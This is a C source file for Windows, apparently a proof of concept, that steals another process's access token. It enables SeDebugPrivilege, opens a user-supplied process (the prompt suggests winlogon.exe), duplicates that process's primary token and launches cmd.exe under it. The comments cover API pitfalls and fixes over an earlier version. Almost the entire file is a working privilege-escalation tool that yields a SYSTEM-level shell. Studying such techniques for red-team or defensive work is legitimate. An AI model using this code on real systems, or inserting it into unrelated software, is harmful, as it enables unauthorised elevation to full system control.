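#include <windows.h>
#include <stdio.h>

/*
 * Enable SeDebugPrivilege in the current process's primary token.
 *
 * Returns TRUE only when the privilege is actually enabled.  Note the
 * AdjustTokenPrivileges contract: it returns TRUE even when it could not
 * enable the requested privilege because the token does not hold it at all
 * (non-admin user, UAC-filtered token); that case is reported solely through
 * GetLastError() == ERROR_NOT_ALL_ASSIGNED, which the original never checked,
 * so it would happily continue to OpenProcess and fail later with a less
 * useful error.
 *
 * This helper does no console I/O; the silent getchar() that used to sit
 * between LookupPrivilegeValue and AdjustTokenPrivileges was a debugging
 * artefact that made a privilege helper block on stdin.
 */
BOOL EnableSeDebugPrivilege(void)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    BOOL ok = FALSE;

    /* TOKEN_ADJUST_PRIVILEGES is all that is needed to flip the enabled bit. */
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;

    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
        goto out;

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL))
        goto out;

    /* TRUE + ERROR_NOT_ALL_ASSIGNED == "privilege not present in token". */
    ok = (GetLastError() != ERROR_NOT_ALL_ASSIGNED);

out:
    CloseHandle(hToken);
    return ok;
}

/*
 * Spawn cmd.exe under a duplicate of another process's primary token.
 *
 * Flow: read a target PID from stdin -> enable SeDebugPrivilege -> open the
 * target with PROCESS_QUERY_LIMITED_INFORMATION (the access OpenProcessToken
 * requires on Vista+) -> OpenProcessToken -> DuplicateTokenEx as a primary
 * token -> CreateProcessWithTokenW.
 *
 * Caveats a practitioner will hit with this PoC:
 *  - CreateProcessWithTokenW needs SeImpersonatePrivilege in the *caller's*
 *    token; without it the call fails with ERROR_PRIVILEGE_NOT_HELD (1314).
 *    CreateProcessAsUserW is the alternative when SeAssignPrimaryTokenPrivilege
 *    is held instead.
 *  - SeDebugPrivilege lets OpenProcess bypass the target process's DACL; the
 *    token object's own DACL still governs OpenProcessToken — expect this to
 *    work from an elevated admin context, not from a plain user (unverified
 *    beyond that here).
 *  - The prompt says winlogon.exe but nothing validates the target; any PID the
 *    caller can open is used as-is.  A PPL-protected target fails at OpenProcess.
 *  - The getchar() calls in main are deliberate manual pause points (e.g. to
 *    inspect handles/tokens in a process viewer before the next step); the
 *    first one merely consumes the newline left behind by scanf.
 *
 * Fixes over the original: the scanf result is checked (an unparsable PID left
 * `pid` uninitialised, which is UB), the PROCESS_INFORMATION handles are closed
 * on success (they leaked), every handle is released on every error path, and
 * the exit status is non-zero when process creation fails (the original
 * returned 0 after printing the failure).
 *
 * Returns 0 on success, 1 on any failure.
 */
int main(void)
{
    DWORD pid = 0;
    HANDLE hProcess = NULL, hToken = NULL, hDupToken = NULL;
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    int rc = 1;

    printf("Enter PID of winlogon.exe: ");
    if (scanf("%lu", &pid) != 1) {
        printf("[-] Invalid PID\n");
        return 1;
    }
    printf("Get the pid\n");
    getchar();

    if (!EnableSeDebugPrivilege()) {
        printf("[-] Failed to enable SeDebugPrivilege\n");
        return 1;
    }
    getchar();

    /* Open the target process; limited query access is sufficient for
     * OpenProcessToken and is the least-privilege choice here. */
    hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    if (!hProcess) {
        printf("[-] Failed to open process. Error: %lu\n", GetLastError());
        return 1;
    }

    /* TOKEN_DUPLICATE for DuplicateTokenEx, TOKEN_ASSIGN_PRIMARY/TOKEN_QUERY so
     * the duplicate can be used to start a process. */
    if (!OpenProcessToken(hProcess,
                          TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY,
                          &hToken)) {
        printf("[-] Failed to open token. Error: %lu\n", GetLastError());
        goto cleanup;
    }

    /* A primary token is required for process creation; MAXIMUM_ALLOWED asks
     * for whatever the token's DACL grants rather than a fixed mask. */
    if (!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityImpersonation,
                          TokenPrimary, &hDupToken)) {
        printf("[-] Failed to duplicate token. Error: %lu\n", GetLastError());
        goto cleanup;
    }

    if (!CreateProcessWithTokenW(hDupToken, LOGON_WITH_PROFILE,
                                 L"C:\\Windows\\System32\\cmd.exe", NULL, 0,
                                 NULL, NULL, &si, &pi)) {
        printf("[-] Failed to create process. Error: %lu\n", GetLastError());
        goto cleanup;
    }

    printf("[+] Process created successfully! with PID: %lu\n", pi.dwProcessId);
    /* The new process keeps running; we only drop our handles to it. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    rc = 0;

cleanup:
    if (hDupToken)
        CloseHandle(hDupToken);
    if (hToken)
        CloseHandle(hToken);
    CloseHandle(hProcess);
    return rc;
}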